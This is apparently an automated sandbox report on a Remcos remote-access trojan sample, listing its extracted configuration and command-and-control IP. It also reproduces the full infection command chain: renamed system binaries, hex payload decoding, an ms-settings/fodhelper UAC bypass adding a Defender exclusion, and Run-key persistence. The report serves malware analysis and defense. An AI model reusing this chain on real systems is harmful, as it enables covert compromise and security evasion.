remcos | 912b9cf7a4906c96b43814617ea1814872ce14412561246c6c59c85901f46821

General

Target

BCC0174237_DRAFT_BL.cmd
Size

4.0MB
MD5

0889785a3d5ca52a21524b294eee7fbb
SHA1

2b1ea80536647537cd5cf9ce6305815f8792b6e2
SHA256

15ed7a1bb6747d6afb7c1665ba33c30c4fa611bc840a8f4e48a8681344419ba1
SHA512

f4e9a26a5f01b39bc391b85eeccb19d46d145cd9338cff0b3e4c53b90d84748c7f12d98597e58b65a5cec98b25ae3e1441332ab7478d38f2fe6eb7c313763fe3
SSDEEP

24576:VOHooIG6mM861SoDFFfcTBmMTdcIxBJGhRCyNaiBKkPK5:VOHooIBPLs/mMRcNaiBKkPK5

Score

10^/10

remcos dodocrypt persistence rat

Malware Config

Extracted

Family

remcos

Botnet

DodoCrypt

C2

172.208.52.39:5404

172.208.52.39:5403

172.208.52.39:5402

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
false
keylog_file
soon.dat
keylog_flag
false
keylog_path
%UserProfile%
mouse_option
false
mutex
ioioeioeioeooeoioe-YSHXR1
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

per.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation per.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	per.exe

Executes dropped EXE 25 IoCs

Processes:

alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exeper.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exe

pid	process
660	alpha.exe
4844	alpha.exe
3264	alpha.exe
1280	alpha.exe
1216	kn.exe
1600	alpha.exe
3516	alpha.exe
3764	alpha.exe
3816	alpha.exe
3004	xkn.exe
2384	alpha.exe
4408	ger.exe
2512	alpha.exe
3924	kn.exe
1736	per.exe
3008	alpha.exe
4284	Ping_c.pif
3936	alpha.exe
4384	alpha.exe
3724	alpha.exe
2308	alpha.exe
4916	alpha.exe
4844	alpha.exe
4820	alpha.exe
5096	alpha.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Ping_c.pif

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Epxiiztp = "C:\\Users\\Public\\Epxiiztp.url"	Ping_c.pif

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1672 taskkill.exe

pid	process
1672	taskkill.exe

Modifies registry class 5 IoCs

Processes:

ger.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\ms-settings	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\ms-settings\shell	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\ms-settings\shell\open	ger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\ms-settings\shell\open\command	ger.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 36 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

xkn.exePing_c.pif

pid process

3004 xkn.exe
3004 xkn.exe
4284 Ping_c.pif
4284 Ping_c.pif
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

xkn.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 3004 xkn.exe
Token: SeDebugPrivilege 1672 taskkill.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

SndVol.exe

pid process

3424 SndVol.exe
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

SndVol.exe

pid process

3424 SndVol.exe
3424 SndVol.exe

description	flow	ioc
HTTP User-Agent header	36	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
3004	xkn.exe
3004	xkn.exe
4284	Ping_c.pif
4284	Ping_c.pif

description	pid	process
Token: SeDebugPrivilege	3004	xkn.exe
Token: SeDebugPrivilege	1672	taskkill.exe

pid	process
3424	SndVol.exe

pid	process
3424	SndVol.exe
3424	SndVol.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exePing_c.pif

description	pid	process	target process
PID 856 wrote to memory of 720	856	cmd.exe	extrac32.exe
PID 856 wrote to memory of 720	856	cmd.exe	extrac32.exe
PID 856 wrote to memory of 660	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 660	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 4844	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 4844	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 3264	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 3264	856	cmd.exe	alpha.exe
PID 3264 wrote to memory of 1928	3264	alpha.exe	extrac32.exe
PID 3264 wrote to memory of 1928	3264	alpha.exe	extrac32.exe
PID 856 wrote to memory of 1280	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 1280	856	cmd.exe	alpha.exe
PID 1280 wrote to memory of 1216	1280	alpha.exe	kn.exe
PID 1280 wrote to memory of 1216	1280	alpha.exe	kn.exe
PID 856 wrote to memory of 1600	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 1600	856	cmd.exe	alpha.exe
PID 1600 wrote to memory of 4748	1600	alpha.exe	extrac32.exe
PID 1600 wrote to memory of 4748	1600	alpha.exe	extrac32.exe
PID 856 wrote to memory of 3516	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 3516	856	cmd.exe	alpha.exe
PID 3516 wrote to memory of 1440	3516	alpha.exe	extrac32.exe
PID 3516 wrote to memory of 1440	3516	alpha.exe	extrac32.exe
PID 856 wrote to memory of 3764	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 3764	856	cmd.exe	alpha.exe
PID 3764 wrote to memory of 4940	3764	alpha.exe	extrac32.exe
PID 3764 wrote to memory of 4940	3764	alpha.exe	extrac32.exe
PID 856 wrote to memory of 3816	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 3816	856	cmd.exe	alpha.exe
PID 3816 wrote to memory of 3004	3816	alpha.exe	xkn.exe
PID 3816 wrote to memory of 3004	3816	alpha.exe	xkn.exe
PID 3004 wrote to memory of 2384	3004	xkn.exe	alpha.exe
PID 3004 wrote to memory of 2384	3004	xkn.exe	alpha.exe
PID 2384 wrote to memory of 4408	2384	alpha.exe	ger.exe
PID 2384 wrote to memory of 4408	2384	alpha.exe	ger.exe
PID 856 wrote to memory of 2512	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 2512	856	cmd.exe	alpha.exe
PID 2512 wrote to memory of 3924	2512	alpha.exe	kn.exe
PID 2512 wrote to memory of 3924	2512	alpha.exe	kn.exe
PID 856 wrote to memory of 1736	856	cmd.exe	per.exe
PID 856 wrote to memory of 1736	856	cmd.exe	per.exe
PID 856 wrote to memory of 3008	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 3008	856	cmd.exe	alpha.exe
PID 3008 wrote to memory of 1672	3008	alpha.exe	taskkill.exe
PID 3008 wrote to memory of 1672	3008	alpha.exe	taskkill.exe
PID 856 wrote to memory of 4284	856	cmd.exe	Ping_c.pif
PID 856 wrote to memory of 4284	856	cmd.exe	Ping_c.pif
PID 856 wrote to memory of 4284	856	cmd.exe	Ping_c.pif
PID 856 wrote to memory of 3936	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 3936	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 4384	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 4384	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 3724	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 3724	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 2308	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 2308	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 4916	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 4916	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 4844	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 4844	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 4820	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 4820	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 5096	856	cmd.exe	alpha.exe
PID 856 wrote to memory of 5096	856	cmd.exe	alpha.exe
PID 4284 wrote to memory of 3252	4284	Ping_c.pif	extrac32.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\BCC0174237_DRAFT_BL.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:856

C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
2⤵
PID:720

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
2⤵
- Executes dropped EXE
PID:660

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
2⤵
- Executes dropped EXE
PID:4844

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3264

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
3⤵
PID:1928

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BCC0174237_DRAFT_BL.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1280

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BCC0174237_DRAFT_BL.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
3⤵
- Executes dropped EXE
PID:1216

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1600

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
3⤵
PID:4748

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3516

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
3⤵
PID:1440

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3764

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
3⤵
PID:4940

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3816

C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3004

C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2384

C:\Users\Public\ger.exe
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
5⤵
- Executes dropped EXE
- Modifies registry class
PID:4408

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2512

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
3⤵
- Executes dropped EXE
PID:3924

C:\Windows \System32\per.exe
"C:\\Windows \\System32\\per.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:1736

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3008

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1672

C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\Libraries\Ping_c.pif
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4284

C:\Windows\SysWOW64\extrac32.exe
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Ping_c.pif C:\\Users\\Public\\Libraries\\Epxiiztp.PIF
3⤵
PID:3252

C:\Windows\SysWOW64\SndVol.exe
C:\Windows\System32\SndVol.exe
3⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3424

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
2⤵
- Executes dropped EXE
PID:3936

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
2⤵
- Executes dropped EXE
PID:4384

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
2⤵
- Executes dropped EXE
PID:3724

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2308

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:4916

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:4844

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:4820

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:5096

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
1⤵
PID:2160

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uasq1cjo.22a.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Libraries\Ping_c.pif

Filesize
1.3MB

MD5
f70fc5241b5a87da4a6cd562bdcff4db

SHA1
bef91b9ce40fd0f36720ec6b8d895f3895645a78

SHA256
5e56eeb51d7cc95afc89da99aa644593576e51702d599777d129029d55346dea

SHA512
73a37d60988f71b9bdcc60942b6e57d1cdbee8a46d06cdb4b0d0ac39bcf9ebc4bdeaf0460cefc92a398042228fb4ddc9cb6f5fea4a72f7b53bd8b202aeb795ad

Download Submit
C:\Users\Public\Ping_c.mp4

Filesize
2.6MB

MD5
b5a262795568eb0ab37138d1601d719b

SHA1
6c528887798a8062eb0b5e44b7bf4ff63e6ee3a5

SHA256
330657b94dd59c84031e4d288a894e414c478c5d36b0d16644dca61e2c2ef885

SHA512
06668f3ffe3fc7828a1470acd2f2020f86ddcfded6d4ee8dfcedf7c0fd0ee60faa4dcd8fc05e6bd2b4a5fe8355be1d4d89977d44425387dacca6f8c3295037c8

Download Submit
C:\Users\Public\alpha.exe

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\ger.exe

Filesize
75KB

MD5
227f63e1d9008b36bdbcc4b397780be4

SHA1
c0db341defa8ef40c03ed769a9001d600e0f4dae

SHA256
c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d

SHA512
101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9

Download Submit
C:\Users\Public\kn.exe

Filesize
1.6MB

MD5
bd8d9943a9b1def98eb83e0fa48796c2

SHA1
70e89852f023ab7cde0173eda1208dbb580f1e4f

SHA256
8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

SHA512
95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

Download Submit
C:\Users\Public\xkn.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows \System32\per.exe

Filesize
48KB

MD5
85018be1fd913656bc9ff541f017eacd

SHA1
26d7407931b713e0f0fa8b872feecdb3cf49065a

SHA256
c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5

SHA512
3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459

Download Submit
memory/3004-38-0x0000027BF93F0000-0x0000027BF9412000-memory.dmp

Filesize
136KB

Download
memory/3424-88-0x00000000167C0000-0x0000000016842000-memory.dmp

Filesize
520KB

Download
memory/3424-90-0x00000000167C0000-0x0000000016842000-memory.dmp

Filesize
520KB

Download
memory/3424-81-0x0000000003210000-0x0000000004210000-memory.dmp

Filesize
16.0MB

Download
memory/3424-103-0x00000000167C0000-0x0000000016842000-memory.dmp

Filesize
520KB

Download
memory/3424-86-0x00000000167C0000-0x0000000016842000-memory.dmp

Filesize
520KB

Download
memory/3424-83-0x00000000167C0000-0x0000000016842000-memory.dmp

Filesize
520KB

Download
memory/3424-89-0x00000000167C0000-0x0000000016842000-memory.dmp

Filesize
520KB

Download
memory/3424-87-0x00000000167C0000-0x0000000016842000-memory.dmp

Filesize
520KB

Download
memory/3424-91-0x00000000167C0000-0x0000000016842000-memory.dmp

Filesize
520KB

Download
memory/3424-93-0x00000000167C0000-0x0000000016842000-memory.dmp

Filesize
520KB

Download
memory/3424-96-0x00000000167C0000-0x0000000016842000-memory.dmp

Filesize
520KB

Download
memory/3424-97-0x00000000167C0000-0x0000000016842000-memory.dmp

Filesize
520KB

Download
memory/3424-98-0x00000000167C0000-0x0000000016842000-memory.dmp

Filesize
520KB

Download
memory/3424-100-0x00000000167C0000-0x0000000016842000-memory.dmp

Filesize
520KB

Download
memory/3424-102-0x00000000167C0000-0x0000000016842000-memory.dmp

Filesize
520KB

Download
memory/4284-75-0x0000000000400000-0x000000000055C000-memory.dmp

Filesize
1.4MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads